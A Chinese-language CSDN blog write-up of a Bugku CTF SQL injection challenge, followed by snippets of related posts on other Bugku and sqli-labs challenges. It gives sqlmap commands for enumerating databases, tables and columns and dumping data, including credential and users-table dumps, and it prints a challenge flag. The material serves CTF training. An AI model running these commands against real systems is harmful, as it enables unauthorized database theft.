Bugku-WEB-成绩单(SQLMap注入)

最新推荐文章于 2024-07-31 12:07:52 发布
最新推荐文章于 2024-07-31 12:07:52 发布
阅读量8.5k 收藏 3
点赞数 3
CC 4.0 BY-SA版权
分类专栏: # Bugku、XCTF-WEB类写题过程 文章标签: SQLMap WEB sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Onlyone_1314/article/details/89281722
本文详细介绍了一个SQL注入攻击的实际操作过程,包括如何利用SQLMap工具进行数据库的探测、表名及列名的爆破,最终成功获取flag的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

成绩单
链接:http://120.24.86.145:8002/chengjidan/
在这里插入图片描述

这个一看应该是SQL注入 先提交一个数据看看

在这里插入图片描述

发现有一个post数据 那就利用这个数据注入白

先抓包

在这里插入图片描述

然后点击action——>从copy to file

我保存在了 D盘Bugku.txt
在这里插入图片描述
先打开sqlmap,测试目标网址使用的数据库:sqlmap -r “D:\浏览器下载\渗透测试工具\SQL注入\SQLMap命令行py2版\Bugku.txt” -p id --current-d
在这里插入图片描述
得到当前使用数据库skctf_flag

之后爆数据库中的表:sqlmap -r “D:\浏览器下载\渗透测试工具\SQL注入\SQLMap命令行py2版\Bugku.txt” -p id --table -D “skctf_flag”
在这里插入图片描述
获得数据库中的表fl4g和sc,看来flag像是在fl4g中:

爆f14g的列:Sqlmap sqlmap -r “D:\浏览器下载\渗透测试工具\SQL注入\SQLMap命令行py2版\Bugku.txt” -p id --column -T “fl4g” -D “skctf_flag”
在这里插入图片描述
得到表fl4g中的列skctf_flag。

继续爆列skctf_flag中的字段:sqlmap -r “D:\浏览器下载\渗透测试工具\SQL注入\SQLMap命令行py2版\Bugku.txt” -p id --dump -C “skctf_flag” -T “fl4g” -D “skctf_flag”
在这里插入图片描述
得到flag:BUGKU{Sql_INJECT0N_4813drd8hz4}

BugKuCTF---sql注入Writeup
驻足
04-22 1636
我的博客 Marsguest’s BLog BugKuCTF—sql注入Writeup 原题地址 http://103.238.227.13:10083/ 首先构造链接 http://103.238.227.13:10083/?id=1' 发现存在过滤,页面没什么反应。右键源文件,发现编码规则GB-2312,猜测为mysql宽字节注入 简单讲解什么是宽字节注入: 1....
BugKuCTF(CTF-练习平台)——WEB-sql注入
Ifish的博客
02-25 3742
打开网址 注入题 修改id的值 发现只在id=1时显示,说明注入点应该是id=1 ‘闭合,发现不报错,尝试宽字节注入 报错 KEY{54f3320dc261f313ba712eb3f13a1f6d}...
BugkuCTF SQL注入1
weixin_34397291的博客
05-06 281
前言 写了这么久的web题,算是把它基础部分都刷完了一遍,以下的几天将持续更新BugkuCTF WEB部分的题解,为了不影响阅读,所以每道题的题解都以单独一篇文章的形式发表,感谢大家一直以来的支持和理解,共勉~~~ 我们点开链接,里面有段这样的代码: //过滤sql $array = array('table','union','and','or','load_file','cre...
[bugku]sqlmap部分
ansu1440的博客
10-22 255
例题目录 [根据校赛的经验来看的话 这种登录的可以先用sqlmap搞一下....] 然后做一个新的web题目 可以先给自己预留5min看会不会解, 不要上来就翻答案n 就5min, 可以两个题,先做题,再补题。 其他的,在哪里学习可以换地方,早点起吧,不要让思维僵化了 例题1:这是一个神奇的登录框 sqlmap要结合burp一起使用;...
bugku--成绩查询
hxhabcd123的博客
08-28 1881
该题记录暴力破解依次破解数据库名、表名、字段名、字段内容的解题过程,以及采用sqlmap工具解题
CTF---Web---SQL注入---02---sqlmap常规模式
qq_22160557的博客
07-29 553
文章目录前言一、题目描述二、解题步骤1、id查询2、sqlmap跑URL总结 前言 题目分类: CTF—WebSQL注入—02—sqlmap常规模式 一、题目描述 题目:sql注入 链接:192.168.87.184 提示:order 二、解题步骤 1、id查询 Step1:根据id查询一下,url变成了 http://192.168.87.184/?order=id&button=submit 由链接可知,此为get传参。 2、sqlmap跑URL Step2:利用kali中的sqlma
Bugku-WEB-web37
fallingskies
01-07 1996
没有回显的地方,显然是盲注 先抓包,再用SQLMAP跑一下 python sqlmap.py -r web37.txt --level 5 --batch 成功,存在基于时间的盲注 第二步,跑数据库名 python sqlmap.py -r web37.txt --dbs 根据提示 python sqlmap.py -r web37.txt --dbs --hex 猜测在bugkuctf中 第三步,跑出表名 python sqlmap.py -r web37.txt -D..
WEB渗透Web突破篇-SQL注入SQLMAP
qq_59468567的博客
07-31 1625
sqlmap --url="" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs -p 指定注入点,注入参数 --user-agent 指定user-agent --random-agent 随机user-agent
CTF题目 [成绩查询 - Bugku CTF]union注入sqlmap的入门使用,两种方法一道题
07-16
### CTF题目 [成绩查询 - Bugku CTF]union注入sqlmap的入门使用 #### 知识点一:SQL注入基础与Union注入原理 **SQL注入**是一种常见的网络安全攻击方式,通过将恶意SQL代码插入应用程序接收的数据中,进而操纵...
19-OWASP top10--SQL注入(四、sqlmap安装及Sqlmap高级使用及注入防范)
XLbb的博客
05-28 1067
4”同时显示HTTP请求;紧跟其后的 "c://lan//1.txt" 是指定要读取的文件路径。动态页面:用ASP、PHP、JSP、ASP.net、Perl、或CGI等编程语言制作,不是独立存在于服务器上的网页文件,只有当用户请求时服务器才返回一个完整的网页,内容存在于数据库中,根据用户发出的不同请求,其提供个性化的网页内容。静态页面:静态页面的URL链接是以.html、htm、.shtml、.xml为链接后缀,存在于服务器上的一个文件,每个网页都是一个独立的文件,内容直接保存在文件中,没有连接数据库。
BugkuCTF web sql注入2
H4ppyD0g的博客
02-08 639
页面post方式提交表单; 所有按钮都不好用; f12检查看到action到login.php,访问一下,username和password都需要填写; 输入用户名直接提交提示用户名和密码都需要填写; 后台扫描没有结果; 经过一些列输入测试,判断admin就是用户名,但是密码不知道; 初步判断为post提交sql注入,'单引号验证一下 admin' -- # 判断应该就是这道题目就是考察的sql注...
BUGKU WP-成绩查询
m0_55631425的博客
09-16 169
方法一:打开题目输入1,F12发现注入点为post传参 bp抓下包,把代码盘下来创一个文件在c盘,在文件夹里创建一个txt复制 然后启动我们的sqlmap,复制txt的绝对路径(也可以在bp中把包复制成txt放入sqlmap目录中)python sqlmap.py -r “C:\grades.bugku\1.txt” 连存在的注入类型也报出来了 –dbs 获取所有数据库 python sqlmap.py -r “C:\grades.bugku\1.txt” --dbs 获取skctf下的表 Sqlmap -
wp-Bugkuctf-web-38(sql注入)【附脚本】
bin789456的博客
08-23 4127
写在前面 本题提示是布尔注入,在之前的布尔注入中,一般是针对能否登录的布尔来进行信息获取,这里是利用username是否存在的布尔来进行信息获取,同时伴随着一些关键字过滤,对于布尔注入的进一步学习有一些帮助。 WP 首先弱密码尝试,显示 password error 更改后显示 username does not exist 这里就是一组布尔,存在与否 输一些关键字测试一下: and,or,=,' ' 看来有关键字屏蔽,并且大小写混用没啥用。 继续测试发现…还过滤了空格,逗号,等号,for 空格用括
SQL 登录注入脚本_[CTF]BugkuCTF - Web - sql注入2
weixin_39581972的博客
11-21 183
http://123.206.87.240:8007/web2/ 全都tm过滤了绝望吗? 提示 !,!=,=,+,-,^,%尝试进行SQL 注入,发现有过滤。判断过滤关键字符串。还是有很多关键字没有过滤的SQL 注入测试uname=admin说明用户名正确。uname=admin'^(length('ajest')!=5)^'此处可以考虑使用异或注入。uname=admin'^(uname!='a...
BugKusql注入
D-R0s1的博客
08-08 991
       今天和大家分享一道BugKu中关于sql注入的题目,在web题中,sql注入的相关知识可以说随处可见了,在这里咱们就就题论题不做其他的拓展和延伸了。        拿到题以后,还是老套路,and 1=1和and 1=2 看看是否带入查询,但是这个题目在?id=1和?id=1'两种条件下都不报错,查看页面源代码发现gb2312于是尝试宽字节注入。?id=1%bf' union sel...
Bugku 成绩查询【WEB
soysauce123的博客
08-15 552
今天咱们尝试用一下一个新的工具,sqlmap,这是一个用于sql注入等等相关的一个很不错的工具。大家好,作为一个CTF方面的小白,以后我也希望每做一次题目就和大家分享分享自己的解题过程。我们都清楚http的请求方式有两种一个get,一个post,这里就是post。那现在这就是里面最后的文件里,【确信】flag肯定就在里面了打开他!然后这里我们是用登陆框的形式输入的,我们就可以想到post登陆框注入。看看找到了啥,四个库~~就我分析这个ctf就很显眼,我估计就是这个嘿嘿。然后就可以开始查询了,先搜索库。...
CTF/CTF练习平台-成绩查询【sqlmap post方法】
Sp4rkW的博客
08-30 5218
原题内容: 快来查查成绩吧 http://120.24.86.145:8002/chengjidan/ 学习资料: SQLMap中文参数用户手册 sqlmap WAF绕过/tamper详解 这题还是很基本的注入,首先手工尝试 延时五秒显示,结果是和只输入1一样,很明显,这是一个注入点,然后sleep既然是有效果的,不烦试一试sqlmap 这里用到了post方...
BUGKU CTF--web 基础{成绩查询}
lulu001128的博客
12-03 1498
BUGKU CTF--web 基础{成绩查询}解题过程
bugku-Web这是一个神奇的登陆框(sqlmap+bp)
Sea_Sand息禅
12-12 1089
根据url提示是让sql注入,但万能密码又无效,这里我们用sqlmap+bp来解题。 首先输入用户密码来登录用bp抓包: 如图将其保存到txt文件中,然后用SQLmap注入 输入命令暴库:sqlmap.py -r "1.txt" -p admin_name --dbs(我将1.txt和sqlmap保存在同一个文件夹下了) -p为注入点,就是admin_name ;r为读文件 会发...
sqli-labs靶场第一关sqlmap注入
最新发布
04-03
### SQLMapSQLi-Labs第一关中的应用 对于SQLi-Labs靶场的第一关(Less-1),可以通过`sqlmap`工具实现自动化的SQL注入攻击。以下是具体的操作方法以及注意事项: #### 工具准备 确保已安装并配置好`sqlmap`环境。如果尚未安装,可通过以下命令完成安装: ```bash git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap cd sqlmap ``` #### 基本操作流程 针对SQLi-Labs第一关的目标URL `http://localhost/sqli-labs/Less-1/?id=1`,可以执行如下命令来探测和利用漏洞。 ##### 探测可注入参数 运行以下命令以确认是否存在SQL注入漏洞,并定位到具体的注入点: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --risk=3 --level=5 --random-agent --batch ``` 上述命令中各选项的作用分别为: - `-u`: 指定目标URL。 - `--risk=3`: 设置风险级别为最高级,尝试更多复杂的payload[^1]。 - `--level=5`: 设定测试强度为最高等级,覆盖尽可能多的场景。 - `--random-agent`: 随机化User-Agent头信息,规避可能的安全防护机制[^2]。 - `--batch`: 自动处理所有交互式提示,默认选择推荐选项[^3]。 ##### 枚举数据库信息 一旦确认存在注入漏洞,则继续深入挖掘敏感数据。例如枚举当前使用的数据库名称: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --current-db --batch ``` 此命令会返回当前正在使用的数据库名字。 ##### 列出所有可用数据库 为了进一步了解服务器上的其他潜在资源,还可以列举全部数据库列表: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --dbs --batch ``` 通过该命令可以获得完整的数据库集合。 ##### 查找特定数据库内的表格结构 假设已经得知某个感兴趣的具体数据库名为`testDB`,那么就可以查询其内部包含哪些表单: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" -D testDB --tables --batch ``` 这里指定了目标数据库并通过`--tables`获取其中存储的数据表清单。 ##### 提取指定表的内容列定义 当明确了某张表之后,下一步便是研究它的字段构成情况: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" -D testDB -T users --columns --batch ``` 这条语句用于揭示所选表(`users`)的各项属性描述。 ##### 导出实际记录值 最后一步就是导出整张表里的真实数据条目了: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" -D testDB -T users --dump --batch ``` 至此完成了从发现漏洞直至提取有用情报的一系列动作。 ### 注意事项 尽管`sqlmap`功能强大,但在实战环境中需谨慎行事,避免触犯法律红线。仅限于授权范围内的渗透测试活动才允许使用此类技术手段。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值